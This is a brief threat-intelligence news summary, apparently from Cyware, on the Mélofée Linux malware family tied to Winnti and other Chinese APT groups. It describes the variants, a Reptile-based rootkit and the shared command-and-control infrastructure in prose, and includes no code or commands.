Go to listing page

New Malware Family Mélofée Linked to Chinese APT Cluster

New Malware Family Mélofée Linked to Chinese APT Cluster
A new malware family called Mélofée has been discovered targeting Linux servers related to a limited number of high-value targets. The implant has been linked to a cluster of Chinese state-sponsored groups, specifically the Winnti group, on the basis of its capabilities and other TTPs.

Mélofée has three variants

ExaTrack detected three different samples of Mélofée, likely dated between January and May 2022.
  • All three samples share a common code base, while their communication protocols and encryption methods are in active development.
  • One of the samples dropped a rootkit, designed to target a specific kernel version. Its code is based on the open-source rootkit project Reptile.
  • All samples comprise an installer that uses shell commands to download the rootkit and the main implant from an attacker-controlled server.

Additionally, researchers observed another implant, dubbed AlienReverse, being used during the campaign. It has a similar code base as Mélofée and uses publicly available tools such as EarthWorm and socks_proxy.

Connection with other tools

The infrastructure used by Mélofée implants has connections with various other tools used by many Chinese APT groups, further strengthening the belief that these groups work collectively as multiple teams within a giant enterprise.
  • Some of the servers have been used as C2 servers for ShadowPad, while others are linked to Winnti and HelloBot.
  • Some domains were used as C2 servers for malicious tools, including Cobalt Strike, PlugX, StowAway, and Spark, popularly known to be used by Chinese APT groups.
  • In addition, these attackers used the legitimate remote control tool toDesk and the ezXSS tool.

Ending notes

The Mélofée malware family is yet another toolset added to the arsenal of the cluster of state-sponsored Chinese APT groups. These implants have been used in a limited number of attacks, indicating these were possibly designed to perform small tasks in the entire attack chain. If not, attackers could be attempting to divert the attention of security experts from their real agenda.
Cyware Publisher

Publisher

Cyware